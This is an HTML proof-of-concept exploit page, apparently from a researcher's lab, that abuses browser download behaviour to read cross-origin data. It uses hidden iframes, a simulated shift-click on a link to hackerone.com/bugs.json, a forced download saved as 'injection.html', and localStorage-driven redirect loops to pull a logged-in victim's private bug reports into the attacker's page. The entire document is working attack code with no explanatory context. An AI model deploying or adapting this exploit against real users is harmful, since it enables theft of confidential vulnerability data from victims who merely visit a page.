<!DOCTYPE html>
|
<html lang="en">
|
<head>
|
|
<style>
|
iframe {
|
visibility: hidden;
|
}
|
</style>
|
|
<script>
|
|
var hash = location.hash.substring(1);
|
var status = localStorage.getItem("status");
|
|
window.onload = function() {
|
if (hash == "ext") {
|
document.getElementById("ext").click();
|
} else if (status == "1" || status == null) {
|
localStorage.setItem('status', '2');
|
getBugs();
|
} else if (status == 2) {
|
localStorage.setItem('status', '1');
|
changeExt();
|
}
|
}
|
|
function getBugs() {
|
simulateClick();
|
setTimeout(function() {
|
location.href = "https://lbherrera.github.io/lab/cross-read/back.html";
|
}, 0);
|
}
|
|
function changeExt() {
|
setInterval(function() {
|
document.getElementById("res").src = "#ext";
|
}, 100);
|
}
|
|
function triggerEnd() {
|
if (hash != "ext") {
|
setTimeout(function() {
|
document.getElementById("end").src = "injection.html";
|
}, 100);
|
}
|
}
|
|
function simulateClick() {
|
var evt = document.createEvent("MouseEvents");
|
evt.initMouseEvent("click", true, true, window,
|
0, 0, 0, 0, 0,
|
false, true, false, false,
|
0, null);
|
var cb = document.getElementById("bug");
|
cb.dispatchEvent(evt);
|
}
|
|
</script>
|
</head>
|
|
<body>
|
<a id="bug" href="https://hackerone.com/bugs.json"></a>
|
<a id="ext" href="response.json" download="injection.html"></a>
|
<iframe id="end" src="injection.html" onload="triggerEnd();"></iframe>
|
<iframe id="res"></iframe>
|
</body>
|
|
</html>
|